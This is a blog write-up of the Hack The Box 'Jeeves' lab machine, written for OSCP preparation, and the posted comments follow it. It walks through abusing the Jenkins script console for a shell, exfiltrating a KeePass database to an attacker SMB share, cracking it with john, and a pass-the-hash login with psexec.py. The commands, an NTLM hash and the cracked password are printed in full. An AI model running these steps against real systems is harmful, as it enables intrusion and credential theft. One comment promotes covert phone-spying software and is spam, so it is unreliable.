OSCP PREPROTİONS – HTB Jeeves

Jeeves machine is a vulnerable machine with Windows operating system among retired machines. It is expected to obtain user and root flags using these vulnerabilities.
We perform a network scan with nmap to recognize the target machine.
Classic Scan

Full Port Scan

As a result of the port scan, 80/tcp http Microsoft IIS httpd 10.0, 135/tcp msrpc Microsoft Windows RPC, 445/tcp microsoft-ds Microsoft Windows 7 – 10 microsoft-ds (workgroup: WORKGROUP), 50000/tcp http Jetty 9.4.z-SNAPSHOT ports are open.
We provide enumeration on port 80.

We looked at the source code in developer mode and with wepanalzyer and we could not get any results.
No matter what we type in the search section, the server keeps giving error 🙂

We did not get any valuable information here, so let’s see if there are hidden files and directories with gobuster

A file directory search did not reveal any valuable information. Let’s go here
Let’s see if http works on port 50000.

Here we have Jetty. (Eclipse Jetty is a Java web server and Java Servlet container. While web servers are usually associated with serving documents to people, Jetty is now often used for machine-to-machine communication within larger software frameworks. )
Here we are doing a file directory scan.

We have detected the /askjeeves directory.
Let’s go here

Here we have logged in to jenkins immediately
Since Jenkins is an automation server on the interface we are providing Enumeration on, it is certain that we will have some kind of direct access to the underlying machine. Going to Manage Jenkins under the top left menu, a scripting console appears.

After clicking

We came across Groovy script and I had no idea about this language.
The part that interests me is that it offers a shell screen that I can access to the machine.

Looking at the first github page

And I use this code and run it

we got shell in user jeeves\kohsuke

We provide local enumeration to get the administrator authorization.
I go to the Documents directory

I came across the .kdbx file where I understand it is keepas database

If I can detect passwords in this database, I can get root flage.
Let’s forward this database to our own machine.
Here we first start smb server on our attacker machine.
python3 /usr/share/doc/python3-impacket/examples/smbserver.py ma .

then copy the CEH.kdbx file from the target machine to the share
copy C:\Users\kohsuke\Documents\CEH.kdbx \10.10.14.19\ma\CEH.kdbx

Then the database comes to our attacker machine

Here we convert the kdbx file to hash value with keepass2john tool
And we’re trying to break it with john
└─# keepass2john CEH.kdbx > hash_db
└─# john –wordlist=/usr/share/wordlists/rockyou.txt hash_db

Here we successfully cracked the master key as “moonshine1”.

We ran the keepassx tool

This is how we accessed the keys

aad3b435b51404eeaad3b435b51404ee:e0fb1fb85756c24235ff238cbe81fe00
hash (we tried other passwords without successful login)
here we try the passthehash attache using the psexec.py tool
psexec.py -hashes aad3b435b51404eeaad3b435b51404ee:e0fb1fb85756c24235ff238ff238cbe81fe00 administrator@10.10.10.63 cmd.exe
We obtained shell from user nt authority\system

We noticed that there is no flag in the Desktop folder, let’s look at Alternate Data Streams to make sure there is a flag here.

This is how we got the root flag.

Comments

  1. Christne

    I am curious to find out what blog system you happen to be utilizing?
    I’m experiencing some small security issues with my latest blog and I would like
    to find something more safe. Do you have any recommendations?

  2. Devra

    Thank you for the good writeup. It in fact was a amusement account
    it. Look advanced to far added agreeable from you!
    However, how can we communicate?

  3. Acacia

    Hello there! This blog post couldn’t be written much better!

    Looking at this article reminds me of my previous roommate!
    He always kept talking about this. I’ll forward this post to him.
    Fairly certain he’s going to have a very good read.
    Many thanks for sharing!

  4. Chardee

    Hello, I think your blog might be having browser compatibility issues.
    When I look at your blog site in Ie, it looks fine but when opening in Internet Explorer, it has some overlapping.
    I just wanted to give you a quick heads up!
    Other then that, terrific blog!

  5. Amee

    My partner and I stumbled over here by a different web address and thought I should check things out.
    I like what I see so i am just following you.
    Look forward to exploring your web page for a
    second time.

  6. Ranjit

    This is very fascinating, You’re an overly professional blogger.
    I’ve joined your feed and sit up for searching for extra of your magnificent post.
    Also, I have shared your website in my social networks

  7. e-commerce

    Hello there! Do you know if they make any plugins
    to help with SEO? I’m trying to get my blog to rank for some targeted keywords but I’m
    not seeing very good results. If you know of any please share.
    Appreciate it! You can read similar article here:
    Dobry sklep

  8. Suivre Téléphone

    Grâce au programme de surveillance parentale, les parents peuvent prêter attention aux activités de téléphonie mobile de leurs enfants et surveiller les messages WhatsApp plus facilement et plus facilement. Le logiciel d’application s’exécute silencieusement en arrière-plan de l’appareil cible, enregistrant des messages de conversation, des émoticônes, des fichiers multimédias, des photos et des vidéos. Il s’applique à tous les appareils fonctionnant sur les systèmes Android et iOS.

  9. tlovertonet

    Hey! This is my 1st comment here so I just wanted to give a quick shout out and tell you I truly enjoy reading your posts. Can you recommend any other blogs/websites/forums that go over the same subjects? Thanks!

  10. Bryon

    Good day! Do you know if they make any plugins to assist with
    SEO? I’m trying to get my site to rank for some targeted keywords but I’m not seeing very good gains.
    If you know of any please share. Many thanks! You can read similar text here: Backlink Portfolio

Bir yanıt yazın

E-posta adresiniz yayınlanmayacak. Gerekli alanlar * ile işaretlenmişlerdir